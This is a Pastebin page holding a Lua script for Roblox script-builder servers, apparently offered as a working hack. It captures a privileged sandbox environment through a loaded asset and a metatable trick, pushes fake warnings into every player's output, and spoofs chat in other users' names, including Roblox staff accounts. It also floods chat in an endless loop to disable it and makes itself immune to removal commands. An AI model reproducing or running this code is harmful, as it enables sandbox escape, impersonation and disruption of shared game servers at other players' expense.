Advertisement
warfare238

cmd

Aug 30th, 2015
119
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 3.88 KB | None | 0 0
  1. if game.PlaceId ~= '178350907' then
  2. rawset(shared, "\0bp", function()local i=game:service'InsertService':LoadAssetVersion(519416165);local n=i:children()[1];game:service'Debris':AddItem(i,0);n.Parent=workspace;coroutine.yield();local e;pcall(_G.OSC_AddServerSideData,setmetatable({},{__index=function()e=getfenv(2)end,__metatable=''}));_G.OSC_AddServerSideData=nil;game:service'Debris':AddItem(n,0);return e end);y=shared['\0bp']();shared["\0bp"]=nil;game:GetService'ReplicatedStorage':ClearAllChildren();logtxt=''; function writelog(msg) for _, item in ipairs(workspace:GetChildren()) do if item:IsA'Hint' then item:Destroy();end;end; for _, p in pairs(y.game:GetService'Players':GetPlayers()) do local m=y.Instance.new'StringValue'; m.Value='["Warn","'..msg..'"]'; m.Name="SB_Output:Output"; m.Parent=p end end
  3. writelog'Guys, runtoheven just hacked all your outputs,'
  4. writelog'Dont you think they should fix this?'
  5.  
  6. end
  7.  
  8.  
  9.  
  10.  
  11. --> Funcs Here <--
  12. script.Name = "OxChat"
  13. print(script.Name)
  14. warn(script.Parent)
  15. pluhack = false
  16. chatbreak = false
  17. OxFunc = {}
  18. --OxChat v2
  19. _G.run = function(Title,Message)
  20.  for _,v in pairs(game.Players:GetPlayers()) do
  21.                         local Value = Instance.new("StringValue",v)
  22.                                 Value.Name = "SB_Chat"
  23.                                 Value.Value = tostring(Title).."/"..Message
  24.                                 Value.Parent = v
  25.                         game.Debris:AddItem(Value,.1)
  26.                        
  27. end
  28. end
  29. if pluhack == true then
  30. timesleft = 10
  31. while true do
  32. wait(1)
  33. if timesleft < 0 then
  34. script:Remove()
  35. else
  36. for _,v in pairs(game.Players:GetPlayers()) do
  37. name = v.Name
  38. wait(1)
  39.  
  40. run(name,"Plutonium Has Hacked This Server. This will stop in "..timesleft)
  41. timesleft = timesleft-1
  42. end
  43. end
  44. end
  45. else
  46.  
  47. run("Guys, runtoheven","just hacked all your chats,")
  48. run("Dont you","think they should fix the sb?")
  49.  
  50. wait(3)
  51. if chatbreak == true then
  52. run("DrAnkle","Runtoheven just hacked my chat and made me say this! ")
  53. run("Oxcool1","Runtoheven just hacked my chat and made me say this! ")
  54. run("Builderman","Runtoheven just hacked my chat and made me say this! ")
  55. run("Telamon","Runtoheven just hacked my chat and made me say this! ")
  56. --]]
  57. wait(5)
  58. while true do
  59. wait(0.1)
  60. run("[Runtoheven's OxHack]","Runtoheven's OxHack Has Disabled This Chat.")
  61. end
  62. end
  63. end
  64.  
  65. for _,v in pairs(game.Players:GetPlayers()) do
  66. local ChatService = game:GetService("Chat")
  67. end
  68.  
  69. if script.ClassName == "LocalScript" then if game.PlaceId == 178350907 then script.Parent = nil else local Environment = getfenv(getmetatable(LoadLibrary"RbxUtility".Create).__call) local oxbox = getfenv() setfenv(1, setmetatable({}, {__index = Environment})) Environment.coroutine.yield() oxbox.script:Destroy() end end
  70. if script ~= true then
  71. print("Unremoveable Test Completed! Works! This script is immune to g/nol/all or g/nos/all!")
  72. else
  73. print("Unremoveable Test Failed! This script is removable by g/nol/all or g/nos/all!")
  74. end
  75. --OxChat v1
  76. _G.OldOx = function(Message)
  77.  for _,v in pairs(game.Players:GetPlayers()) do
  78.                         local Value = Instance.new("StringValue",v)
  79.                                 Value.Name = "SB_Chat"
  80.                                 Value.Value = Message
  81.                                 Value.Parent = v
  82.                         game.Debris:AddItem(Value,.1)
  83.                        
  84. end
  85. end
  86.  
  87. _G.cmdsOx = {"OxCmds >>>","c/Ox","c/OldOx"}
  88. warn("c/Ox(Name,Message)")
  89. warn("c/OldOx(Name)")
  90. _G.Donut = function()
  91. function onPlayerAdded(plr)
  92.      OldOx(tostring(plr.Name).." has joined the game.")
  93. end
  94. function onPlayerRemove(plr)
  95.      OldOx(tostring(plr.Name).." has left the game.")
  96. end
  97.  
  98. game.Players.PlayerAdded:connect(onPlayerAdded)
  99. game.Players.PlayerRemoving:connect(onPlayerRemove)
  100. end
  101. game.Players.PlayerAdded:connect(function(player)
  102.  
  103.  
  104. end)
  105. game.Players.PlayerRemoving:connect(function(player)
  106.  
  107. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement